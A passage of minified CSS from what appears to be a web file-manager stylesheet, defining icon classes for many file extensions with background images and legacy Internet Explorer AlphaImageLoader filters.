\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-fla{background-image:url("../../../images/file_icon/icon_file/fla.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');}.x-font{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-gif{background-image:url("../../../images/file_icon/icon_file/gif.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');}.x-gz{background-image:url("../../../images/file_icon/icon_file/gz.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gz.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gz.png?ver=3.30',sizingMethod='scale');}.x-h{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-hdr{background-image:url("../../../images/file_icon/icon_file/hdr.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hdr.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hdr.png?ver=3.30',sizingMethod='scale');}.x-hlp{background-image:url("../../../images/file_icon/icon_file/hlp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hlp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hlp.png?ver=3.30',sizingMethod='scale');}.x-html{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-indd{background-image:url("../../../images/file_icon/icon_file/indd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/indd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/indd.png?ver=3.30',sizingMethod='scale');}.x-ini{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-ipa{background-image:url("../../../images/file_icon/icon_file/ipa.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ipa.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ipa.png?ver=3.30',sizingMethod='scale');}.x-jar{background-image:url("../../../images/file_icon/icon_file/jar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jar.png?ver=3.30',sizingMethod='scale');}.x-java{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-jpg{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-js{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-json{background-image:url("../../../images/file_icon/icon_file/json.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/json.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/json.png?ver=3.30',sizingMethod='scale');}.x-key{background-image:url("../../../images/file_icon/icon_file/key.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/key.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/key.png?ver=3.30',sizingMethod='scale');}.x-ldf{background-image:url("../../../images/file_icon/icon_file/ldf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ldf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ldf.png?ver=3.30',sizingMethod='scale');}.x-lnk{background-image:url("../../../images/file_icon/icon_file/lnk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/lnk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/lnk.png?ver=3.30',sizingMethod='scale');}.x-makefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-mdb{background-image:url("../../../images/file_icon/icon_file/mdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdb.png?ver=3.30',sizingMethod='scale');}.x-mdf{background-image:url("../../../images/file_icon/icon_file/mdf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdf.png?ver=3.30',sizingMethod='scale');}.x-mht{background-image:url("../../../images/file_icon/icon_file/mht.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mht.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mht.png?ver=3.30',sizingMethod='scale');}.x-midi{background-image:url("../../../images/file_icon/icon_file/midi.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/midi.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/midi.png?ver=3.30',sizingMethod='scale');}.x-mpp{background-image:url("../../../images/file_icon/icon_file/mpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpp.png?ver=3.30',sizingMethod='scale');}.x-mpt{background-image:url("../../../images/file_icon/icon_file/mpt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpt.png?ver=3.30',sizingMethod='scale');}.x-msg{background-image:url("../../../images/file_icon/icon_file/msg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msg.png?ver=3.30',sizingMethod='scale');}.x-msi{background-image:url("../../../images/file_icon/icon_file/msi.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msi.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msi.png?ver=3.30',sizingMethod='scale');}.x-numbers{background-image:url("../../../images/file_icon/icon_file/numbers.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/numbers.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/numbers.png?ver=3.30',sizingMethod='scale');}.x-odp{background-image:url("../../../images/file_icon/icon_file/odp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odp.png?ver=3.30',sizingMethod='scale');}.x-ods{background-image:url("../../../images/file_icon/icon_file/ods.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ods.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ods.png?ver=3.30',sizingMethod='scale');}.x-odt{background-image:url("../../../images/file_icon/icon_file/odt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odt.png?ver=3.30',sizingMethod='scale');}.x-oexe{background-image:url("../../../images/file_icon/icon_file/oexe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe.png?ver=3.30',sizingMethod='scale');}.x-oexe2{background-image:url("../../../images/file_icon/icon_file/oexe2.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe2.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe2.png?ver=3.30',sizingMethod='scale');}.x-ogg{background-image:url("../../../images/file_icon/icon_file/ogg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ogg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ogg.png?ver=3.30',sizingMethod='scale');}.x-pages{background-image:url("../../../images/file_icon/icon_file/pages.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pages.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pages.png?ver=3.30',sizingMethod='scale');}.x-pdb{background-image:url("../../../images/file_icon/icon_file/pdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdb.png?ver=3.30',sizingMethod='scale');}.x-pdf{background-image:url("../../../images/file_icon/icon_file/pdf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdf.png?ver=3.30',sizingMethod='scale');}.x-php{background-image:url("../../../images/file_icon/icon_file/php.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php.png?ver=3.30',sizingMethod='scale');}.x-pkg{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-pl{background-image:url("../../../images/file_icon/icon_file/pl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pl.png?ver=3.30',sizingMethod='scale');}.x-png{background-image:url("../../../images/file_icon/icon_file/png.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/png.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/png.png?ver=3.30',sizingMethod='scale');}.x-pps{background-image:url("../../../images/file_icon/icon_file/pps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pps.png?ver=3.30',sizingMethod='scale');}.x-ppsx{background-image:url("../../../images/file_icon/icon_file/ppsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppsx.png?ver=3.30',sizingMethod='scale');}.x-ppt{background-image:url("../../../images/file_icon/icon_file/ppt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppt.png?ver=3.30',sizingMethod='scale');}.x-pptx{background-image:url("../../../images/file_icon/icon_file/pptx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pptx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pptx.png?ver=3.30',sizingMethod='scale');}.x-pot{background-image:url("../../../images/file_icon/icon_file/pot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pot.png?ver=3.30',sizingMethod='scale');}.x-potx,.x-ppam{background-image:url("../../../images/file_icon/icon_file/potx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/potx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/potx.png?ver=3.30',sizingMethod='scale');}.x-prproj{background-image:url("../../../images/file_icon/icon_file/prproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/prproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/prproj.png?ver=3.30',sizingMethod='scale');}.x-ps1{background-image:url("../../../images/file_icon/icon_file/ps1.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ps1.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ps1.png?ver=3.30',sizingMethod='scale');}.x-psd{background-image:url("../../../images/file_icon/icon_file/psd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/psd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/psd.png?ver=3.30',sizingMethod='scale');}.x-pspimage{background-image:url("../../../images/file_icon/icon_file/pspimage.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pspimage.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pspimage.png?ver=3.30',sizingMethod='scale');}.x-pst{background-image:url("../../../images/file_icon/icon_file/pst.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pst.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pst.png?ver=3.30',sizingMethod='scale');}.x-pub{background-image:url("../../../images/file_icon/icon_file/pub.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pub.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pub.png?ver=3.30',sizingMethod='scale');}.x-py{background-image:url("../../../images/file_icon/icon_file/py.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/py.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/py.png?ver=3.30',sizingMethod='scale');}.x-rar{background-image:url("../../../images/file_icon/icon_file/rar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rar.png?ver=3.30',sizingMethod='scale');}.x-rb{background-image:url("../../../images/file_icon/icon_file/rb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rb.png?ver=3.30',sizingMethod='scale');}.x-reg{background-image:url("../../../images/file_icon/icon_file/reg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/reg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/reg.png?ver=3.30',sizingMethod='scale');}.x-resx{background-image:url("../../../images/file_icon/icon_file/resx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/resx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/resx.png?ver=3.30',sizingMethod='scale');}.x-rtf{background-image:url("../../../images/file_icon/icon_file/rtf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rtf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rtf.png?ver=3.30',sizingMethod='scale');}.x-sitx{background-image:url("../../../images/file_icon/icon_file/sitx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sitx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sitx.png?ver=3.30',sizingMethod='scale');}.x-sln{background-image:url("../../../images/file_icon/icon_file/sln.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sln.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sln.png?ver=3.30',sizingMethod='scale');}.x-sql{background-image:url("../../../images/file_icon/icon_file/sql.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sql.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sql.png?ver=3.30',sizingMethod='scale');}.x-suo{background-image:url("../../../images/file_icon/icon_file/suo.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/suo.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/suo.png?ver=3.30',sizingMethod='scale');}.x-svg{background-image:url("../../../images/file_icon/icon_file/svg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/svg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/svg.png?ver=3.30',sizingMethod='scale');}.x-swf{background-image:url("../../../images/file_icon/icon_file/swf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/swf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/swf.png?ver=3.30',sizingMethod='scale');}.x-tar{background-image:url("../../../images/file_icon/icon_file/tar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tar.png?ver=3.30',sizingMethod='scale');}.x-tga{background-image:url("../../../images/file_icon/icon_file/tga.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tga.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tga.png?ver=3.30',sizingMethod='scale');}.x-tgz{background-image:url("../../../images/file_icon/icon_file/tgz.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tgz.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tgz.png?ver=3.30',sizingMethod='scale');}.x-txt{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-vb{background-image:url("../../../images/file_icon/icon_file/vb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vb.png?ver=3.30',sizingMethod='scale');}.x-vbproj{background-image:url("../../../images/file_icon/icon_file/vbproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbproj.png?ver=3.30',sizingMethod='scale');}.x-vbs{background-image:url("../../../images/file_icon/icon_file/vbs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbs.png?ver=3.30',sizingMethod='scale');}.x-vcf{background-image:url("../../../images/file_icon/icon_file/vcf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcf.png?ver=3.30',sizingMethod='scale');}.x-vcproj{background-image:url("../../../images/file_icon/icon_file/vcproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcproj.png?ver=3.30',sizingMethod='scale');}.x-vcxproj{background-image:url("../../../images/file_icon/icon_file/vcxproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcxproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcxproj.png?ver=3.30',sizingMethod='scale');}.x-vdw{background-image:url("../../../images/file_icon/icon_file/vdw.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdw.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdw.png?ver=3.30',sizingMethod='scale');}.x-vdx{background-image:url("../../../images/file_icon/icon_file/vdx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdx.png?ver=3.30',sizingMethod='scale');}.x-vsd{background-image:url("../../../images/file_icon/icon_file/vsd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsd.png?ver=3.30',sizingMethod='scale');}.x-vsdx{background-image:url("../../../images/file_icon/icon_file/vsdx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsdx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsdx.png?ver=3.30',sizingMethod='scale');}.x-vss{background-image:url("../../../images/file_icon/icon_file/vss.png");background-image:none 